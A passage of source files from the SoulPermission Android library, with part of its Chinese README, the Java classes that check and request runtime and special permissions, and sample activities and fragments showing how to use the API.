Toast.makeText(ApiGuideActivity.this, permission.toString() +
"\n is ok , you can do your operations", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission permission) {
// see CheckPermissionWithRationaleAdapter
if (permission.shouldRationale()) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
" \n you should show a explain for user then retry ", Toast.LENGTH_SHORT).show();
} else {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
" \n is refused you can not do next things", Toast.LENGTH_SHORT).show();
}
}
});
```
- 检查某项权限
```java
//you can also use checkPermissions() for a series of permissions
Permission checkResult = SoulPermission.getInstance().checkSinglePermission(Manifest.permission.ACCESS_FINE_LOCATION);
```
- 检查特殊权限[通知权限]
```java
boolean checkResult = SoulPermission.getInstance().checkSpecialPermission(Special.NOTIFICATION);
```
- 检查并请求特殊权限[未知应用安装]
```java
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.UNKNOWN_APP_SOURCES, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Toast.makeText(ApiGuideActivity.this, "install unKnown app is enable now", Toast.LENGTH_SHORT).show();
}
@Override
public void onDenied(Special permission) {
Toast.makeText(ApiGuideActivity.this, "install unKnown app is disable yet", Toast.LENGTH_SHORT).show();
}
});
```
- 跳转到应用设置页
```java
SoulPermission.getInstance().goApplicationSettings(new GoAppDetailCallBack() {
@Override
public void onBackFromAppDetail(Intent data) {
//if you need to know when back from app detail
Utils.showMessage(view, "back from go appDetail");
}
});
```
- 设置跳过老的权限系统(老的系统默认权限直接授予)
```java
SoulPermission.skipOldRom(true);
```
- 设置debug模式(看日志打印)
```java
SoulPermission.setDebug(true);
```
#### 注意事项:
- 最低支持Android 4.0(Api level 14)
- SoulPermission内部使用contentProvider自动初始化,如果你项目中使用了通过替换Application方式从而可能会导致SoulPermission内部初始化失败的框架(如Tinker,腾讯乐固等),请手动在你的Application类中调用init即可(通过设置debug,可以看到错误日志打印和相关Toast)。
```java
//invoke init in your application when auto init failed
public class SimpleApplication extends Application {
@Override
public void onCreate() {
super.onCreate();
//no necessary
SoulPermission.init(this);
}
}
```
- 如果需要在某个页面创建时候请求权限,请在onCreate()中使用、请不要在onResume()调用,否则权限未被动态授予前会陷入死循环。
### Screenshot:


- for common Permission

- for Special Permission

### MoreDetail:
#### [工作原理和最佳示例](https://blog.csdn.net/u014626094/article/details/89438614)
<file_sep>package com.qw.soul.permission.request;
import android.annotation.TargetApi;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import com.qw.soul.permission.bean.Special;
import com.qw.soul.permission.callbcak.GoAppDetailCallBack;
import com.qw.soul.permission.callbcak.RequestPermissionListener;
import com.qw.soul.permission.callbcak.SpecialPermissionListener;
import static android.os.Build.VERSION_CODES.M;
/**
* @author cd5160866
*/
public interface IPermissionActions {
/**
* 请求权限
*
* @param permissions 权限
* @param listener 回调
*/
@TargetApi(M)
void requestPermissions(String[] permissions, RequestPermissionListener listener);
/**
* 请求特殊权限
*
* @param permission 特殊权限
* @param listener 回调
*/
void requestSpecialPermission(Special permission, SpecialPermissionListener listener);
/**
* 去应用详情页
*
* @param callBack 回调
*/
void goAppDetail(@Nullable GoAppDetailCallBack callBack);
}
<file_sep>package com.qw.sample;
import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.view.View;
import com.qw.sample.guide.ApiGuideActivity;
import com.qw.sample.guide.ApiGuideAppComponentActivity;
import com.qw.sample.guide.WithPagerFragmentActivity;
import com.qw.sample.guide.fragment.ContainerActivity;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
}
public void before(View view) {
startActivity(new Intent(MainActivity.this, BeforeActivity.class));
}
public void after(View view) {
startActivity(new Intent(MainActivity.this, AfterActivity.class));
}
public void apiGuideActivity(View view) {
startActivity(new Intent(MainActivity.this, ApiGuideActivity.class));
}
public void apiGuideAppComponentActivity(View view) {
startActivity(new Intent(MainActivity.this, ApiGuideAppComponentActivity.class));
}
public void fragment(View view) {
ContainerActivity.start(this, false);
}
public void supportFragment(View view) {
ContainerActivity.start(this, true);
}
public void fragmentWithViewPager(View view) {
startActivity(new Intent(MainActivity.this, WithPagerFragmentActivity.class));
}
}
<file_sep>package com.qw.soul.permission;
import android.app.Activity;
import android.app.Application;
import android.content.Context;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.Handler;
import android.os.Looper;
import androidx.annotation.CheckResult;
import androidx.annotation.MainThread;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.app.ActivityCompat;
import android.util.Log;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.bean.Permissions;
import com.qw.soul.permission.bean.Special;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
import com.qw.soul.permission.callbcak.CheckRequestPermissionsListener;
import com.qw.soul.permission.callbcak.CheckStatusCallBack;
import com.qw.soul.permission.callbcak.GoAppDetailCallBack;
import com.qw.soul.permission.callbcak.RequestPermissionListener;
import com.qw.soul.permission.callbcak.SpecialPermissionListener;
import com.qw.soul.permission.checker.CheckerFactory;
import com.qw.soul.permission.debug.PermissionDebug;
import com.qw.soul.permission.request.PermissionConfig;
import com.qw.soul.permission.request.PermissionRequester;
import java.util.LinkedList;
import java.util.List;
import static android.os.Build.VERSION_CODES.KITKAT;
import static android.os.Build.VERSION_CODES.O;
/**
* https://github.com/soulqw/SoulPermission
* @author cd5160866
*/
public class SoulPermission {
private static final String TAG = SoulPermission.class.getSimpleName();
private volatile static SoulPermission instance;
private static Application globalContext;
private volatile static boolean alreadyInit;
private PermissionActivityLifecycle lifecycle;
/**
* 获取 SoulPermission 对象
*/
public static SoulPermission getInstance() {
if (null == instance) {
synchronized (SoulPermission.class) {
if (instance == null) {
instance = new SoulPermission();
}
}
}
return instance;
}
/**
* 设置debug
* 可见日志打印
* 当自动初始化失败后,有toast 提示
*/
public static void setDebug(boolean isDebug) {
PermissionDebug.setDebug(isDebug);
}
/**
* 是否跳过旧的系统权限检查
* 默认6.0 以下使用 AppOps 检查,跳过的话 6.0以下全部为true
*
* @param isSkip 是否跳过
*/
public static void skipOldRom(boolean isSkip) {
PermissionConfig.skipOldRom = isSkip;
}
/**
* init
* no necessary
* invoke it when auto init failed
*
* @see #setDebug(boolean)
*/
public static void init(@NonNull Application application) {
if (alreadyInit) {
PermissionDebug.w(TAG, "already init");
return;
}
alreadyInit = true;
globalContext = application;
getInstance().registerLifecycle(globalContext);
PermissionDebug.d(TAG, "user init");
}
/**
* 检查权限
*
* @param permission 权限名称
* @return 返回检查的结果
* @see #checkPermissions
*/
@CheckResult
public Permission checkSinglePermission(@NonNull String permission) {
if (checkPermissions(permission).length == 0) {
return null;
}
return checkPermissions(permission)[0];
}
/**
* 一次检查多项权限
*
* @param permissions 权限名称 ,可检测多个
* @return 返回检查的结果
*/
@CheckResult
public Permission[] checkPermissions(@NonNull String... permissions) {
List<Permission> resultPermissions = new LinkedList<>();
Activity activity = getTopActivity();
if (null == activity) {
PermissionDebug.w(TAG, " get top activity failed check your app status");
return new Permission[0];
}
for (String permission : permissions) {
int isGranted = checkPermission(activity, permission)
? PackageManager.PERMISSION_GRANTED
: PackageManager.PERMISSION_DENIED;
boolean shouldRationale;
shouldRationale = ActivityCompat.shouldShowRequestPermissionRationale(activity, permission);
resultPermissions.add(new Permission(permission, isGranted, shouldRationale));
}
return PermissionTools.convert(resultPermissions);
}
/**
* 检查特殊权限,譬如通知
*
* @param special 特殊权限枚举
* @return 检查结果
* @see Special
*/
public boolean checkSpecialPermission(Special special) {
Activity activity = getTopActivity();
if (null == activity) {
PermissionDebug.w(TAG, " get top activity failed check your app status");
return true;
}
return CheckerFactory.create(activity, special).check();
}
/**
* 单个权限的检查与申请
* 在敏感操作前,先检查权限和请求权限,当完成操作后可做后续的事情
*
* @param permissionName 权限名称 例如:Manifest.permission.CALL_PHONE
* @param listener 请求之后的回调
* @see #checkAndRequestPermissions
*/
@MainThread
public void checkAndRequestPermission(@NonNull final String permissionName, @NonNull final CheckRequestPermissionListener listener) {
checkAndRequestPermissions(Permissions.build(permissionName), new CheckRequestPermissionsListener() {
@Override
public void onAllPermissionOk(Permission[] allPermissions) {
listener.onPermissionOk(allPermissions[0]);
}
@Override
public void onPermissionDenied(Permission[] refusedPermissions) {
listener.onPermissionDenied(refusedPermissions[0]);
}
});
}
/**
* 多个权限的检查与申请
* 在敏感操作前,先检查权限和请求权限,当完成操作后可做后续的事情
*
* @param permissions 多个权限的申请 Permissions.build(Manifest.permission.CALL_PHONE,Manifest.permission.CAMERA)
* @param listener 请求之后的回调
*/
@MainThread
public void checkAndRequestPermissions(@NonNull Permissions permissions, @NonNull final CheckRequestPermissionsListener listener) {
//check permission first
Permission[] checkResult = checkPermissions(permissions.getPermissionsString());
if (checkResult.length == 0) {
PermissionDebug.w(TAG, "bad status ,check your application status");
return;
}
//get refused permissions
final Permission[] refusedPermissionList = filterRefusedPermissions(checkResult);
// all permissions ok
if (refusedPermissionList.length == 0) {
PermissionDebug.d(TAG, "all permissions ok");
listener.onAllPermissionOk(checkResult);
return;
}
//can request runTime permission
if (canRequestRunTimePermission()) {
requestPermissions(Permissions.build(refusedPermissionList), listener);
} else {
PermissionDebug.d(TAG, "some permission refused but can not request");
listener.onPermissionDenied(refusedPermissionList);
}
}
/**
* 检查和请求特殊权限
*
* @param special 特殊权限、系统弹窗,未知来源
* {@link com.qw.soul.permission.bean.Special }
* @param listener 请求回调
*/
@MainThread
public void checkAndRequestPermission(@NonNull Special special, @NonNull SpecialPermissionListener listener) {
boolean permissionResult = checkSpecialPermission(special);
if (permissionResult) {
listener.onGranted(special);
return;
}
int currentOsVersion = Build.VERSION.SDK_INT;
switch (special) {
case UNKNOWN_APP_SOURCES:
if (currentOsVersion < O) {
listener.onDenied(special);
return;
}
break;
case SYSTEM_ALERT:
case NOTIFICATION:
default:
if (currentOsVersion < KITKAT) {
listener.onDenied(special);
return;
}
break;
}
requestSpecialPermission(special, listener);
}
/**
* 获得全局applicationContext
*/
public Context getContext() {
return globalContext;
}
/**
* 提供当前栈顶可用的Activity
*
* @return the top Activity in your app
*/
@Nullable
@CheckResult
public Activity getTopActivity() {
Activity result = null;
try {
result = lifecycle.getActivity();
} catch (Exception e) {
if (PermissionDebug.isDebug()) {
PermissionTools.toast(getContext(), e.toString());
Log.e(TAG, e.toString());
}
}
return result;
}
/**
* 到系统权限设置页
* 鉴于碎片化太严重,1.1.7去掉厂商页面,统一跳应用详情页
* 请使用新的方法
*
* @see #goApplicationSettings()
*/
@Deprecated
public void goPermissionSettings() {
goApplicationSettings();
}
@Deprecated
/**
* 跳转到应用详情页
* @param requestCode 可自定义requestCode方便自己在回调中处理
* 此方法无法在Fragment中获取onActivityResult 故废弃
* @see #goApplicationSettings(GoAppDetailCallBack callBack)
*/
public void goApplicationSettings(int requestCode) {
PermissionTools.jumpAppDetail(getTopActivity(), requestCode);
}
/**
* 跳转到应用详情页面
*
* @param callBack 如果你需要在回到页面的时候接受回调的话
*/
public void goApplicationSettings(@Nullable final GoAppDetailCallBack callBack) {
checkStatusBeforeDoSomething(new CheckStatusCallBack() {
@Override
public void onStatusOk(Activity activity) {
new PermissionRequester(activity)
.goAppDetail(callBack);
}
});
}
public void goApplicationSettings() {
goApplicationSettings(null);
}
void autoInit(Application application) {
if (null != globalContext) {
return;
}
globalContext = application;
registerLifecycle(globalContext);
}
private SoulPermission() {
}
private void registerLifecycle(Application context) {
if (null != lifecycle) {
context.unregisterActivityLifecycleCallbacks(lifecycle);
}
lifecycle = new PermissionActivityLifecycle();
context.registerActivityLifecycleCallbacks(lifecycle);
}
/**
* 筛选出被拒绝的权限
*/
private Permission[] filterRefusedPermissions(Permission[] in) {
final List<Permission> out = new LinkedList<>();
for (Permission permission : in) {
boolean isPermissionOk = permission.isGranted();
//add refused permission
if (!isPermissionOk) {
out.add(permission);
}
}
PermissionDebug.d(TAG, "refusedPermissionList.size" + out.size());
return PermissionTools.convert(out);
}
/**
* 是否满足请求运行时权限的条件
*/
private boolean canRequestRunTimePermission() {
return !PermissionTools.isOldPermissionSystem(getTopActivity());
}
private boolean checkPermission(Context context, String permission) {
return CheckerFactory.create(context, permission).check();
}
private void checkStatusBeforeDoSomething(final CheckStatusCallBack callBack) {
//check container status
final Activity activity;
try {
activity = lifecycle.getActivity();
} catch (Exception e) {
//activity status error do not request
if (PermissionDebug.isDebug()) {
PermissionTools.toast(getContext(), e.toString());
Log.e(TAG, e.toString());
}
return;
}
//check MainThread
if (!PermissionTools.assertMainThread()) {
PermissionDebug.w(TAG, "do not request permission in other thread");
new Handler(Looper.getMainLooper()).post(new Runnable() {
@Override
public void run() {
callBack.onStatusOk(activity);
}
});
return;
}
//can do
callBack.onStatusOk(activity);
}
private void requestPermissions(final Permissions permissions, final CheckRequestPermissionsListener listener) {
checkStatusBeforeDoSomething(new CheckStatusCallBack() {
@Override
public void onStatusOk(Activity activity) {
requestRuntimePermission(activity, permissions.getPermissions(), listener);
}
});
}
private void requestRuntimePermission(final Activity activity, final Permission[] permissionsToRequest, final CheckRequestPermissionsListener listener) {
PermissionDebug.d(TAG, "start to request permissions size= " + permissionsToRequest.length);
new PermissionRequester(activity)
.withPermission(permissionsToRequest)
.request(new RequestPermissionListener() {
@Override
public void onPermissionResult(Permission[] permissions) {
//this list contains all the refused permissions after request
List<Permission> refusedListAfterRequest = new LinkedList<>();
for (Permission requestResult : permissions) {
if (!requestResult.isGranted()) {
refusedListAfterRequest.add(requestResult);
}
}
if (refusedListAfterRequest.size() == 0) {
PermissionDebug.d(TAG, "all permission are request ok");
listener.onAllPermissionOk(permissionsToRequest);
} else {
PermissionDebug.d(TAG, "some permission are refused size=" + refusedListAfterRequest.size());
listener.onPermissionDenied(PermissionTools.convert(refusedListAfterRequest));
}
}
});
}
private void requestSpecialPermission(final Special specialPermission, final SpecialPermissionListener listener) {
checkStatusBeforeDoSomething(new CheckStatusCallBack() {
@Override
public void onStatusOk(Activity activity) {
new PermissionRequester(activity)
.withPermission(specialPermission)
.request(listener);
}
});
}
}
<file_sep>package com.qw.sample.guide.fragment;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.widget.FrameLayout;
/**
* @author cd5160866
* @date 2019-06-11
*/
public class ContainerActivity extends AppCompatActivity {
public static void start(Activity activity, boolean isSupport) {
Intent intent = new Intent(activity, ContainerActivity.class);
intent.putExtra("isSupport", isSupport);
activity.startActivity(intent);
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
int contentViewId = 1000;
FrameLayout frameLayout = new FrameLayout(this);
frameLayout.setId(contentViewId);
setContentView(frameLayout);
if (getIntent().getExtras() == null) {
return;
}
boolean isSupport = getIntent().getExtras().getBoolean("isSupport", false);
if (isSupport) {
getSupportFragmentManager()
.beginTransaction()
.replace(contentViewId, new ApiGuideSupportFragment())
.commitNowAllowingStateLoss();
} else {
getFragmentManager().beginTransaction()
.replace(contentViewId, new ApiGuideFragment())
.commitAllowingStateLoss();
}
}
}
<file_sep>package com.qw.soul.permission.checker;
import android.Manifest;
import android.app.AppOpsManager;
import android.content.Context;
import android.os.Binder;
import android.os.Build;
import com.qw.soul.permission.debug.PermissionDebug;
import com.qw.soul.permission.request.PermissionConfig;
import java.lang.reflect.Method;
import static android.os.Build.VERSION_CODES.KITKAT;
/**
* @author cd5160866
*/
class AppOpsChecker implements PermissionChecker {
private static final String TAG = AppOpsChecker.class.getSimpleName();
private Context context;
private String permission;
AppOpsChecker(Context context) {
this(context, null);
}
AppOpsChecker(Context context, String permission) {
this.context = context;
this.permission = permission;
}
/**
* 老的通過反射方式檢查權限狀態
* 结果可能不准确,如果返回false一定未授予
* 按需在里面添加
* <p>
* 如果没匹配上或者异常都默认权限授予
*
* @return 检查结果
*/
@Override
public boolean check() {
if (null == permission) {
return true;
}
if (PermissionConfig.skipOldRom) {
return true;
}
switch (permission) {
case Manifest.permission.READ_CONTACTS:
return checkOp(4);
case Manifest.permission.WRITE_CONTACTS:
return checkOp(5);
case Manifest.permission.CALL_PHONE:
return checkOp(13);
case Manifest.permission.READ_PHONE_STATE:
return checkOp(51);
case Manifest.permission.CAMERA:
return checkOp(26);
case Manifest.permission.READ_EXTERNAL_STORAGE:
return checkOp(59);
case Manifest.permission.WRITE_EXTERNAL_STORAGE:
return checkOp(60);
case Manifest.permission.ACCESS_FINE_LOCATION:
return checkOp(1);
case Manifest.permission.ACCESS_COARSE_LOCATION:
return checkOp(0);
case Manifest.permission.RECORD_AUDIO:
return checkOp(27);
case Manifest.permission.BODY_SENSORS:
return checkOp(56);
case Manifest.permission.READ_CALENDAR:
return checkOp(8);
case Manifest.permission.WRITE_CALENDAR:
return checkOp(9);
case Manifest.permission.SEND_SMS:
return checkOp(20);
case Manifest.permission.READ_SMS:
return checkOp(14);
case Manifest.permission.RECEIVE_SMS:
return checkOp(16);
default:
break;
}
return true;
}
/**
* check by reflect
*/
boolean checkOp(int op) {
if (Build.VERSION.SDK_INT < KITKAT) {
PermissionDebug.d(TAG, "4.4 below");
return true;
}
try {
AppOpsManager manager = (AppOpsManager) context.getSystemService(Context.APP_OPS_SERVICE);
Method method = AppOpsManager.class.getDeclaredMethod("checkOp", int.class, int.class, String.class);
return 0 == (int) method.invoke(manager, op, Binder.getCallingUid(), context.getPackageName());
} catch (Exception e) {
PermissionDebug.w(TAG, e.toString());
e.printStackTrace();
}
return true;
}
}
<file_sep>package com.qw.sample.guide.fragment;
import android.os.Bundle;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.fragment.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Toast;
import com.qw.sample.R;
import com.qw.sample.utils.ApiGuideUtils;
public class ApiGuideSupportFragment extends Fragment {
private View root;
@Nullable
@Override
public View onCreateView(@NonNull LayoutInflater inflater, @Nullable final ViewGroup container, @Nullable Bundle savedInstanceState) {
Toast.makeText(getActivity(), "use permission Based on SupportFragment", Toast.LENGTH_SHORT).show();
root = LayoutInflater.from(container.getContext()).inflate(R.layout.layout_api_guide, container, false);
findViewById(R.id.checkSinglePermission)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkSinglePermission(v);
}
});
findViewById(R.id.requestSinglePermission)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.requestSinglePermission(v);
}
});
findViewById(R.id.requestPermissions)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.requestPermissions(v);
}
});
findViewById(R.id.requestSinglePermissionWithRationale)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.requestSinglePermissionWithRationale(v);
}
});
findViewById(R.id.checkNotification)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkNotification(v);
}
});
findViewById(R.id.checkAndRequestNotification)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestNotification(v);
}
});
findViewById(R.id.checkAndRequestSystemAlert)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestSystemAlert(v);
}
});
findViewById(R.id.checkAndRequestUnKnownSource)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestUnKnownSource(v);
}
});
findViewById(R.id.checkAndRequestWriteSystemSettings)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.checkAndRequestWriteSystemSettings(v);
}
});
findViewById(R.id.goApplicationSettings)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.goApplicationSettings(v);
}
});
findViewById(R.id.getTopActivity)
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ApiGuideUtils.getTopActivity(v);
}
});
return root;
}
private <T extends View> T findViewById(int id) {
return root.findViewById(id);
}
}
<file_sep>package com.qw.sample.guide.fragment;
import android.Manifest;
import android.graphics.Color;
import android.os.Bundle;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.fragment.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Toast;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.adapter.SimplePermissionAdapter;
import com.qw.soul.permission.bean.Permission;
public class PagerItemFragment extends Fragment {
public static PagerItemFragment get(int color) {
PagerItemFragment fragment = new PagerItemFragment();
Bundle bundle = new Bundle();
bundle.putInt("Color", color);
fragment.setArguments(bundle);
return fragment;
}
@Nullable
@Override
public View onCreateView(@NonNull LayoutInflater inflater, @Nullable final ViewGroup container, @Nullable Bundle savedInstanceState) {
View view = new View(container.getContext());
int color = getArguments().getInt("Color");
view.setBackgroundColor(color);
if (color == Color.RED) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.BODY_SENSORS, new SimplePermissionAdapter() {
@Override
public void onPermissionOk(Permission permission) {
Toast.makeText(container.getContext(), "sensor permission ok", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission permission) {
Toast.makeText(container.getContext(), "sensor permission denied", Toast.LENGTH_SHORT).show();
}
});
}
return view;
}
}
<file_sep>package com.qw.soul.permission.exception;
/**
* @author cd5160866
*/
public class ContainerStatusException extends IllegalStateException {
public ContainerStatusException() {
super(" activity did not existence, check your app status before use soulPermission");
}
}
<file_sep>package com.qw.sample.adapter;
import android.app.Activity;
import android.content.DialogInterface;
import androidx.appcompat.app.AlertDialog;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
/**
* @author cd5160866
*/
public abstract class CheckPermissionAdapter implements CheckRequestPermissionListener {
@Override
public void onPermissionDenied(Permission permission) {
//SoulPermission提供栈顶Activity
Activity activity = SoulPermission.getInstance().getTopActivity();
if (null == activity) {
return;
}
String permissionDesc = permission.getPermissionNameDesc();
new AlertDialog.Builder(activity)
.setTitle("提示")
.setMessage(permissionDesc + "异常,请前往设置->权限管理,打开" + permissionDesc + "。")
.setPositiveButton("去设置", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialogInterface, int i) {
//去设置页
SoulPermission.getInstance().goPermissionSettings();
}
}).create().show();
}
}
<file_sep>package com.qw.sample.utils;
import android.Manifest;
import android.app.Activity;
import android.content.Intent;
import com.google.android.material.snackbar.Snackbar;
import android.view.View;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.bean.Permissions;
import com.qw.soul.permission.bean.Special;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
import com.qw.soul.permission.callbcak.CheckRequestPermissionsListener;
import com.qw.soul.permission.callbcak.GoAppDetailCallBack;
import com.qw.soul.permission.callbcak.SpecialPermissionListener;
/**
* @author cd5160866
*/
public class ApiGuideUtils {
public static void checkSinglePermission(View view) {
//you can also use checkPermissions() for a series of permissions
Permission checkResult = SoulPermission.getInstance().checkSinglePermission(Manifest.permission.ACCESS_FINE_LOCATION);
Utils.showMessage(view, checkResult.toString());
}
public static void requestSinglePermission(final View view) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.ACCESS_FINE_LOCATION,
//if you want do noting or no need all the callbacks you may use SimplePermissionAdapter instead
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Utils.showMessage(view, permission.toString() + "\n is ok , you can do your operations");
}
@Override
public void onPermissionDenied(Permission permission) {
Utils.showMessage(view, permission.toString() + " \n is refused you can not do next things");
}
});
}
public static void requestPermissions(final View view) {
SoulPermission.getInstance().checkAndRequestPermissions(
Permissions.build(Manifest.permission.CAMERA, Manifest.permission.WRITE_EXTERNAL_STORAGE),
//if you want do noting or no need all the callbacks you may use SimplePermissionsAdapter instead
new CheckRequestPermissionsListener() {
@Override
public void onAllPermissionOk(Permission[] allPermissions) {
Utils.showMessage(view, allPermissions.length + "permissions is ok" + " \n you can do your operations");
}
@Override
public void onPermissionDenied(Permission[] refusedPermissions) {
Utils.showMessage(view, refusedPermissions[0].toString() + " \n is refused you can not do next things");
}
});
}
public static void requestSinglePermissionWithRationale(final View view) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_CONTACTS,
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Utils.showMessage(view, permission.toString() + "\n is ok , you can do your operations");
}
@Override
public void onPermissionDenied(Permission permission) {
// see CheckPermissionWithRationaleAdapter
if (permission.shouldRationale()) {
Utils.showMessage(view, permission.toString() + " \n you should show a explain for user then retry ");
} else {
Utils.showMessage(view, permission.toString() + " \n is refused you can not do next things");
}
}
});
}
public static void checkNotification(View view) {
boolean checkResult = SoulPermission.getInstance().checkSpecialPermission(Special.NOTIFICATION);
Utils.showMessage(view, checkResult ? "Notification is enable" :
"Notification is disable \n you may invoke checkAndRequestPermission and enable notification");
}
public static void checkAndRequestNotification(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.NOTIFICATION, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "Notification is enable now ");
}
@Override
public void onDenied(Special permission) {
Snackbar.make(view, "Notification is disable yet ", Snackbar.LENGTH_LONG)
.setAction("retry", new View.OnClickListener() {
@Override
public void onClick(View v) {
checkAndRequestNotification(v);
}
}).show();
}
});
}
public static void checkAndRequestSystemAlert(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.SYSTEM_ALERT, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "System Alert is enable now ");
}
@Override
public void onDenied(Special permission) {
Utils.showMessage(view, "System Alert is disable yet ");
}
});
}
public static void checkAndRequestUnKnownSource(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.UNKNOWN_APP_SOURCES, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "install unKnown app is enable now ");
}
@Override
public void onDenied(Special permission) {
Utils.showMessage(view, "install unKnown app is disable yet");
}
});
}
public static void checkAndRequestWriteSystemSettings(final View view) {
//if you want do noting or no need all the callbacks you may use SimpleSpecialPermissionAdapter instead
SoulPermission.getInstance().checkAndRequestPermission(Special.WRITE_SETTINGS, new SpecialPermissionListener() {
@Override
public void onGranted(Special permission) {
Utils.showMessage(view, "install unKnown app is enable now ");
}
@Override
public void onDenied(Special permission) {
Utils.showMessage(view, "install unKnown app is disable yet");
}
});
}
public static void goApplicationSettings(final View view) {
SoulPermission.getInstance().goApplicationSettings(new GoAppDetailCallBack() {
@Override
public void onBackFromAppDetail(Intent data) {
//if you need to know when back from app detail
Utils.showMessage(view, "back from go appDetail");
}
});
}
public static void getTopActivity(View view) {
Activity activity = SoulPermission.getInstance().getTopActivity();
if (null != activity) {
Utils.showMessage(view, activity.getClass().getSimpleName() + " " + activity.hashCode());
}
}
}
<file_sep>package com.qw.soul.permission.request;
import android.app.Activity;
import android.app.Fragment;
import android.os.Build;
import androidx.fragment.app.FragmentActivity;
import androidx.fragment.app.FragmentManager;
import com.qw.soul.permission.debug.PermissionDebug;
import com.qw.soul.permission.request.fragment.PermissionFragment;
import com.qw.soul.permission.request.fragment.PermissionSupportFragment;
import java.lang.reflect.Field;
import java.util.List;
/**
* @author cd5160866
*/
class PermissionFragmentFactory {
private static final String TAG = PermissionFragmentFactory.class.getSimpleName();
private static final String FRAGMENT_TAG = "permission_fragment_tag";
static IPermissionActions create(Activity activity) {
IPermissionActions action;
if (activity instanceof FragmentActivity) {
FragmentManager supportFragmentManager = getSupportFragmentManager((FragmentActivity) activity);
PermissionSupportFragment permissionSupportFragment = (PermissionSupportFragment) supportFragmentManager.findFragmentByTag(FRAGMENT_TAG);
if (null == permissionSupportFragment) {
permissionSupportFragment = new PermissionSupportFragment();
supportFragmentManager.beginTransaction()
.add(permissionSupportFragment, FRAGMENT_TAG)
.commitNowAllowingStateLoss();
}
action = permissionSupportFragment;
} else {
android.app.FragmentManager fragmentManager = getFragmentManager(activity);
PermissionFragment permissionFragment = (PermissionFragment) fragmentManager.findFragmentByTag(FRAGMENT_TAG);
if (null == permissionFragment) {
permissionFragment = new PermissionFragment();
fragmentManager.beginTransaction()
.add(permissionFragment, FRAGMENT_TAG)
.commitAllowingStateLoss();
//make it commit like commitNow
fragmentManager.executePendingTransactions();
}
action = permissionFragment;
}
return action;
}
private static FragmentManager getSupportFragmentManager(FragmentActivity activity) {
FragmentManager fragmentManager = activity.getSupportFragmentManager();
//some specific rom will provide a null List
boolean childAvailable = null != fragmentManager.getFragments();
if (childAvailable && fragmentManager.getFragments().size() > 0
&& null != fragmentManager.getFragments().get(0)) {
return fragmentManager.getFragments().get(0).getChildFragmentManager();
}
return fragmentManager;
}
private static android.app.FragmentManager getFragmentManager(Activity activity) {
android.app.FragmentManager fragmentManager = activity.getFragmentManager();
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
if (null != fragmentManager.getFragments()
&& fragmentManager.getFragments().size() > 0
&& null != fragmentManager.getFragments().get(0)) {
return fragmentManager.getFragments().get(0).getChildFragmentManager();
}
} else {
try {
